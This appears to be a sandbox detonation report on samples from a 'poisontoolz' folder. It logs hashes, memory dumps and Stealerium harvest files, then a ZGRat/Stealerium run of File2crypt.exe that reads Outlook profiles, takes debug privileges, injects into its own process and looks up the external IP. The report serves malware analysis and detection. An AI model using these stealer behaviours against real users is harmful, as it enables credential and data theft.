| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | b65b0fffc080d61f81df44a349dcbd5e |
| SHA1 | 8540e8fc99e86275493bffb8e0224a29b6f4d6e5 |
| SHA256 | 6cd8bc3eedeaf4ef2d54af586634e03d8bf7f9a3fdf4256f86a3dd4d006440f7 |
| SHA512 | 29f48f648ba705f29522d0dab95afe44cccb878610a6ecb45bb7131834a31de97bf8f3683ef8a946389507faa90296c1bd33063dba43fc5e95640c1b8f529bdc |
memory/1000-1093-0x00000000028E0000-0x00000000028E1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | daf72125c1f6c2c88d6a41564d3f025e |
| SHA1 | dbe3ad9f09bdda33f0f318b0d766375baf1fc1f9 |
| SHA256 | 91241978919b4738d0be1891144d0614903a08b1e1975e425407e4694ca342b2 |
| SHA512 | 1133b6013f5a4132d21b208b4a8622e1fd0ae409acdf535d24f00e985bc7387b27407f7cd8bd991e33255cc4752794f6015c0580bdd3885e1b1d6af7665a9776 |
memory/1000-1106-0x0000000005950000-0x0000000005AF2000-memory.dmp
memory/1000-1107-0x0000000005AF0000-0x0000000005B3C000-memory.dmp
memory/4664-1113-0x0000000000400000-0x0000000000592000-memory.dmp
memory/4664-1114-0x0000000071B40000-0x00000000722F0000-memory.dmp
memory/1000-1115-0x0000000071B40000-0x00000000722F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | ebaf811ecff8139439cbcad21e0788d5 |
| SHA1 | f494b3df2a71e137f86b7e9b6f06f6a659534311 |
| SHA256 | 3b1dce1a2e8e3753e7a29b43946c83be26ac9d28de854bae2a81e37af5c58349 |
| SHA512 | 62580c267c09b181f9772d8d132738240022d9abb3c1a89d564c4f0e0d0a2f59161a7527e0d6799cfc1fd5176670d7231d3a7eceb31a4bb3db59f4854efc2219 |
memory/4664-1121-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1127-0x0000000005180000-0x0000000005188000-memory.dmp
memory/4664-1126-0x00000000059E0000-0x0000000005A06000-memory.dmp
memory/4664-1125-0x0000000005950000-0x00000000059E2000-memory.dmp
memory/4664-1129-0x0000000006830000-0x0000000006838000-memory.dmp
memory/4664-1130-0x0000000006850000-0x000000000686E000-memory.dmp
memory/4664-1128-0x0000000006820000-0x000000000682A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | 27fda8b4ccd36e3f67a3567b72d190ff |
| SHA1 | 23a3af45be473349ef5425af4523899c50ce76d8 |
| SHA256 | a696b5a790f107591693870ea2dcc3ace5f8ab11fa192435e99f1c70a7c4b90a |
| SHA512 | 4be81d52a28bf5e7be69dd1db51803288b5817e4e9c56efd1bb78767695f3753e1afa10d3bb29d0d4d684f27c707aa1d53f386d5c04c8b080ffd4d718a7b267e |
memory/4664-1187-0x0000000007020000-0x00000000070B2000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Process.txt
| MD5 | 78f78af907cebe8c34bc2b58820ccb8c |
| SHA1 | 0a1e64adcc9ccd1b59ab0fec3460fd888ddc8d28 |
| SHA256 | 3aaa47224ec7e88b7c1c6b9ad9f69ef163b4a3bb432e2d9cad7a490b81f2d22f |
| SHA512 | 20cad89ca15bd38ca5d621850e914c784dec50c8fd4bc45ac739da6425d84146935d4f3d9d1649e58bc22dc7a91f98559b8492a2183873bc271dd83e90ae238d |
memory/4664-1297-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1296-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1331-0x0000000006930000-0x00000000069AA000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
memory/4664-1404-0x0000000006BB0000-0x0000000006C62000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Windows.txt
| MD5 | d3181270194f2c60fb84019a64a67ec0 |
| SHA1 | e60cbb8316305efa9717d6c99702560621cd9901 |
| SHA256 | 08a20a4a7d010e9670afd792ae04a642a7c4b66101bba3111d3f159a220a643d |
| SHA512 | d08944250f7b4e7aaf54f43851596a57da056fa5da3f6c73103d186e7f944ff72cb3a308b76fb38b59376eeebe1838cc7634b3f6f1cdda64fe696dcc07b1f305 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/4664-1406-0x0000000008120000-0x0000000008474000-memory.dmp
memory/4664-1408-0x0000000071B40000-0x00000000722F0000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\msgid.dat
| MD5 | 83d0759b0e0bd95d8ec3af4b24d34892 |
| SHA1 | 3ef09021405d57c5c6b6581432064ed6dd055120 |
| SHA256 | dc12668b00a4dd01fa9bdc70018d359e4733d3db9cb387bddeb95e44a3f6585c |
| SHA512 | cf525f2798199adf0a67f68bfa36a206978bc26557616d7dc20d5e0c99a3cf422ca1e9db1724b1dcf31a1f1716e9dd273e3427bad04bf6db395f6575fdf6c783 |
memory/4664-1419-0x00000000072E0000-0x00000000072EA000-memory.dmp
memory/4664-1426-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1433-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1434-0x0000000005190000-0x00000000051A0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
142s
Max time network
150s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Document.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62049B54191AA028E86743705555F846 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4D586AF83A5279C81D184BD7E1A33E34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4D586AF83A5279C81D184BD7E1A33E34 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=03736972FF31BF8D4652A6A526315093 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=03736972FF31BF8D4652A6A526315093 --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=293C24FCA16FF55C946C9D1A4B780C29 --mojo-platform-channel-handle=2424 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=01D52CBAE8FBB77AF724ABDA1DC63950 --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64CD67F886FBE9EAA9AFF20EC0881F8D --mojo-platform-channel-handle=2780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | c223511c13af47b706b807b82beeaaf6 |
| SHA1 | c8fc8f5becbd11754cd65dbc08418e2a7dd37fd5 |
| SHA256 | 2f12ec42fb50a1e42825c92df791725ff5733e5e3748f1d0275f6cf5f1548796 |
| SHA512 | 603d2ce27610fe36a065525e58532a549f24fd4f2c9fe12804d6dbbfbb773f4b13526a4841619274072eba990f9201fb82c5703fa8e640fd4345efca69e96bd3 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
14s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealerium
ZGRat
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3856 set thread context of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
C:\Windows\SysWOW64\chcp.com
